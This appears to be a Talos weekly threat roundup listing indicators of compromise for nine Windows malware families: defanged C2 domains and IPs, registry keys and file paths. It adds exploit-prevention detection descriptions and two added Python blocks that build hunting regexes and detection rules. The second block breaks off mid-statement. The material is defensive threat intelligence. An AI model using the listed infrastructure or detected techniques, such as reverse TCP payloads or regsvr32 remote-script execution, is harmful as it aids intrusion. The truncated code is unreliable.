Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 25 and July 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Malware.Nymaim-9874463-0 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm (DGA) to produce candidate command and control (C2) domains from which it retrieves additional payloads.
Win.Packed.Tofsee-9874757-1 | Packed | Tofsee is multi-purpose malware that features several modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the botnet's size.
Win.Packed.Redline-9874565-0 | Packed | Redline Stealer is an information-stealer written in .NET and sold on hacking forums.
Win.Packed.Trickbot-9874595-0 | Packed | TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Dridex-9874605-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Zbot-9874821-0 | Trojan | Zbot, also known as Zeus, is a trojan that steals sensitive information, including login credentials to financial websites, using methods like key-logging and form-grabbing.
Win.Packed.Zusy-9874915-0 | Packed | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.NetWire-9875000-0 | Packed | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, use remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Formbook-9875089-1 | Dropper | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.

Threat Breakdown

Win.Malware.Nymaim-9874463-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 45 samples
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
exobfeswo[.]com | 21
jestionefen[.]com | 21
google[.]com | 13
microsoft[.]com | 8

Files and/or directories created | Occurrences
%TEMP%\fro.dfx | 21
\Documents and Settings\All Users\pxs\pil.ohu | 21

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Packed.Tofsee-9874757-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 59 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config1) | 52
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | 52
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config0) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description) | 52
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath) | 32
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\idadcmnx) | 4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\xspsrbcm) | 4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\ezwzyijt) | 4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\dyvyxhis) | 4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\rmjmlvwg) | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\nifihrsc) | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\jebednoy) | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\zurutdeo) | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\avsvuefp) | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\pkhkjtue) | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\wrorqabl) | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\faxazjku) | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\bwtwvfgq) | 2

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile | 52
%SystemRoot%\SysWOW64\config\systemprofile:.repos | 52
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> | 52
%TEMP%\<random, matching '[a-z]{8}'>.exe | 51
%System32%\config\systemprofile:.repos | 29
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) | 29
%TEMP%\<random, matching '[a-z]{4,9}'>.exe | 6
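The templated indicators in these tables (the <random, matching '...'> placeholders and %VAR%/<HKxx> tokens) can be compiled into regexes and run across endpoint telemetry. The following is an added example, not Talos code: the templates are copied from the Tofsee tables above, the expansions for %SystemRoot%, %System32%, %TEMP% and the registry hive prefixes are assumed defaults, and the observations it hunts over are constructed.

```python
"""Compile the roundup's templated indicators into regexes and hunt with them.

Added example, not Talos code. The templates are copied from the Tofsee
tables (the '(copy)' annotation dropped); the variable expansions are
assumed defaults for a 64-bit install and the telemetry lines are constructed.
"""
import re

# Indicator templates exactly as the roundup prints them. The
# <random, matching '...'> placeholder already carries a regex, and
# %VAR% / <HKxx> tokens stand in for per-host paths and registry hives.
TEMPLATES = [
    r"%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>",
    r"%TEMP%\<random, matching '[a-z]{8}'>.exe",
    r"%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe",
    r"<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>",
    r"<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS",
]

# Assumed expansions (regex fragments) for the tokens used in the tables.
ENV = {
    "%SystemRoot%": r"C:\\Windows",
    "%System32%": r"C:\\Windows\\System32",
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "<HKLM>": r"(?:HKEY_LOCAL_MACHINE|HKLM)",
    "<HKCU>": r"(?:HKEY_CURRENT_USER|HKCU)",
}

# One tokenizer pass: group 1 = placeholder regex, group 2 = %VAR% or <HKxx>.
TOKEN = re.compile(r"<random, matching '([^']+)'>|(%[A-Za-z0-9()]+%|<HK[A-Z]+>)")


def template_to_regex(template):
    """Translate one indicator template into a compiled regex.

    Literal path/key fragments and the variable expansions are matched
    case-insensitively (Windows semantics); the placeholder's own character
    class is kept verbatim, so '[a-z]{8}' stays lowercase-only.
    """
    parts = []
    pos = 0
    for m in TOKEN.finditer(template):
        literal = template[pos:m.start()]
        if literal:
            parts.append("(?i:" + re.escape(literal) + ")")
        if m.group(1):
            parts.append(m.group(1))  # placeholder regex used as written
        else:
            token = m.group(2)  # known variable, or an unknown one kept literal
            parts.append("(?i:" + ENV.get(token, re.escape(token)) + ")")
        pos = m.end()
    tail = template[pos:]
    if tail:
        parts.append("(?i:" + re.escape(tail) + ")")
    return re.compile("".join(parts))


def hunt(templates, observations):
    """Return (template, observation) pairs for every observation fully matching a template."""
    compiled = [(t, template_to_regex(t)) for t in templates]
    return [(t, obs) for obs in observations for t, rx in compiled if rx.fullmatch(obs)]


def refang(indicator):
    """Undo the '[.]' defanging the roundup applies to IPs and domains."""
    return indicator.replace("[.]", ".")


# Constructed file-creation and registry observations to hunt across.
OBSERVED = [
    r"C:\Windows\SysWOW64\idadcmnx",            # eight lowercase letters: hit
    r"C:\Windows\SysWOW64\drivers",             # seven letters: no hit
    r"C:\Users\alice\AppData\Local\Temp\qwertyui.exe",
    r"C:\Windows\System32\abcdefg\hijklm.exe",
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\A1B2C3D4",
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip",  # no hit
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
]

if __name__ == "__main__":
    for template, obs in hunt(TEMPLATES, OBSERVED):
        print(f"{obs}\n    matches {template}")
    print(refang("47[.]91[.]242[.]212"))
```

A hit on a single template is a hunting lead, not a verdict; the roundup's own caveat that occurrence counts do not indicate maliciousness applies to these matches too.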

File Hashes


*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Packed.Redline-9874565-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
api[.]ip[.]sb | 11
api[.]ip[.]sb[.]cdn[.]cloudflare[.]net | 10
jevanerrin[.]xyz | 2
whatareyousayblog[.]info | 1
rdanoriran[.]xyz | 1
kathonaror[.]xyz | 1

Files and/or directories created | Occurrences
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log | 16
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp | 12
%LOCALAPPDATA%\Yandex | 11
%LOCALAPPDATA%\Yandex\YaAddon | 11

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Packed.Trickbot-9874595-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 30 samples
Mutexes | Occurrences
GLOBAL\{<random GUID>} | 25

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
support[.]microsoft[.]com | 1
help[.]twitter[.]com | 1
support[.]apple[.]com | 1
support[.]oracle[.]com | 1
www[.]intel[.]com | 1
load3rd[.]casa | 1

Files and/or directories created | Occurrences
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs | 10
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt | 5
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp | 5
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\410a82fa6c31bc3976e373e503fedc26834f7ff5e9c5872637ac673fb30c9736.exe | 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\2f2b484e4e2595a5c5de261b39fcbc1bef6753361b30ea5942c803f8466909e0.exe | 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\0690656c022396267a513508a1de6900bddc1865271522c7be677759c63605de.exe | 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\348e3889b6a35598eee4ac901ac7fe4e647dd5f91871a019ebf9cc001501b2fc.exe | 1
%ProgramData%\Microsoft\Windows\Start Menu\Programs\WinPwrSvs\39ce75f99dcd894f408299f2c1c61152962c83a41823a57e610f50dcd1933a00.exe | 1

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Packed.Dridex-9874605-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: trkcore) | 13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: DisableTaskMgr) | 13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 (Value Name: CheckSetting) | 13

Mutexes | Occurrences
<random, matching [A-Z0-9]{10}> | 13
\Sessions\2\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex | 1

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Files and/or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) | 13
\Temp\HncDownload\Update.log | 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) | 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp | 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\HncCheck.exe.log | 1
%LOCALAPPDATA%\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl | 1

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Trojan.Zbot-9874821-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\WINRAR | 21
<HKCU>\SOFTWARE\WINRAR (Value Name: HWID) | 21
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9 (Value Name: F) | 13
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5 (Value Name: F) | 13
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC (Value Name: F) | 13

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
Files and/or directories created | Occurrences
%TEMP%\abcd.bat | 13

File Hashes


*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Packed.Zusy-9874915-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER | 22
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER (Value Name: id) | 22
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER (Value Name: 3_tag) | 18
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER (Value Name: k_tag) | 18
<HKLM>\SOFTWARE\WOW6432NODE\MACHINER (Value Name: s_t) | 18

Mutexes | Occurrences
Global\<random guid> | 22

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
104[.]21[.]70[.]96 | 15
172[.]67[.]222[.]123 | 13

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
samegresites[.]live | 22

Files and/or directories created | Occurrences
%ProgramFiles(x86)%\MachinerData | 22
%System32%\Tasks\Microsoft Windows Defender Update | 22

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Packed.NetWire-9875000-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\NETWIRE | 23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: officeii365) | 23
<HKCU>\SOFTWARE\NETWIRE (Value Name: HostId) | 23
<HKCU>\SOFTWARE\NETWIRE (Value Name: Install Date) | 23

Mutexes | Occurrences
- | 23
Global\6e46b6a1-d905-11eb-b5f8-00501e3ae7b6 | 1

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
155[.]94[.]198[.]169 | 23

Files and/or directories created | Occurrences
\test.exe | 23
%APPDATA%\Install | 23
%APPDATA%\Install\offiice365.exe | 23
\TEMP\test.exe | 23

File Hashes


*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK (images not reproduced here)


Win.Dropper.Formbook-9875089-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 36 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2 | 33
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX | 33
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX\20.0.1 (EN-US)\MAIN | 33
<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA THUNDERBIRD | 33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN | 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: XTD8FTBPKB) | 6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: LPXPD) | 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: LNUPD) | 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: YLRX_RP0WZ) | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: XZM8FTBP0B) | 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: YFILPF18FD) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: KTRDUFWHV) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: 4H9L_R5H) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: _XVHJH6XCNID) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: NX4DUXPHO6M) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: ZTRDUFW0V) | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: K4D0BVQ8FLG) | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: MRE004N0NP) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: JXK46TRX_TF) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: H480CZWHUB0) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: JREXV4RHNPX) | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: MND0QFLPOL) | 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: NND0P6CHAN) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: 9R0DOPOHN) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN (Value Name: HXSDZXPXV) | 1

Mutexes | Occurrences
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Files and/or directories created | Occurrences
\TEMP\test.exe | 34
%APPDATA%\9PNPN9R7\9PNlogim.jpeg | 34
%APPDATA%\9PNPN9R7\9PNlogri.ini | 34
%APPDATA%\9PNPN9R7\9PNlogrv.ini | 34
%APPDATA%\9PNPN9R7 | 33
%APPDATA%\9PNPN9R7\9PNlog.ini | 33
%APPDATA%\9PNPN9R7\9PNlogrc.ini | 33
\test.exe | 24
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\test.exe.log | 24
%TEMP%\DB1 | 17
%APPDATA%\9PNPN9R7\9PNlogrf.ini | 17
%APPDATA%\9PNPN9R7\9PNlogrg.ini | 17
%ProgramFiles(x86)%\Konu8x | 6
%TEMP%\Konu8x | 6
%ProgramFiles(x86)%\Ygbcpjfp0 | 5
%TEMP%\Ygbcpjfp0 | 5
%ProgramFiles(x86)%\Ygdyljnbp | 3
%TEMP%\Ygdyljnbp | 3
%ProgramFiles(x86)%\Ygbcpjfp0\useronu8x.exe | 3
%TEMP%\Ygbcpjfp0\useronu8x.exe | 3
%ProgramFiles(x86)%\Ygbcpjfp0\configonu8x.exe | 2
%TEMP%\Ygbcpjfp0\configonu8x.exe | 2
%ProgramFiles(x86)%\Ygdyljnbp\user7nihzln0.exe | 2
%TEMP%\Ygdyljnbp\user7nihzln0.exe | 2
%ProgramFiles(x86)%\Uonu8x\msjjot8.exe | 1

*See JSON for more IOCs

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (10295)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Reverse tcp payload detected - (4276)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
Excessively long PowerShell command detected - (4020)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Crystalbit-Apple DLL double hijack detected - (2014)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
A Microsoft Office process has started a Windows utility. - (736)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Squiblydoo application control bypass attempt detected. - (699)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
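Three of the behaviors described above (an Office process spawning a Windows utility, an excessively long PowerShell command line, and regsvr32.exe pointed at remotely hosted script content) expressed as simple matching rules over process-creation events. This is an added example, not Talos or AMP code; the event fields, process lists, URL check and length threshold are assumptions, and the sample events are constructed.

```python
import re
from dataclasses import dataclass
@dataclass
class ProcessEvent:  # constructed event shape; field names are assumptions
    parent_image: str
    image: str
    command_line: str
# Assumed process lists and threshold; tune to the environment being monitored.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe"}
LONG_POWERSHELL_THRESHOLD = 1000  # characters of command line
_REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
def _name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()  # file name only

def office_spawned_utility(ev):
    return _name(ev.parent_image) in OFFICE_PARENTS and _name(ev.image) in WINDOWS_UTILITIES

def excessively_long_powershell(ev, threshold=LONG_POWERSHELL_THRESHOLD):
    return _name(ev.image) in {"powershell.exe", "pwsh.exe"} and len(ev.command_line) > threshold

def squiblydoo_attempt(ev):
    # regsvr32.exe handed script content hosted on a remote server
    return _name(ev.image) == "regsvr32.exe" and bool(_REMOTE_URL.search(ev.command_line))

RULES = {
    "A Microsoft Office process has started a Windows utility": office_spawned_utility,
    "Excessively long PowerShell command detected": excessively_long_powershell,
    "Squiblydoo application control bypass attempt detected": squiblydoo_attempt,
}

def evaluate(events):
    """Return {rule name: number of events that matched} for a batch of events."""
    hits = {name: 0 for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name] += 1
    return hits
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not from the page
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo invoice"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -enc " + "QUFB" * 400),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
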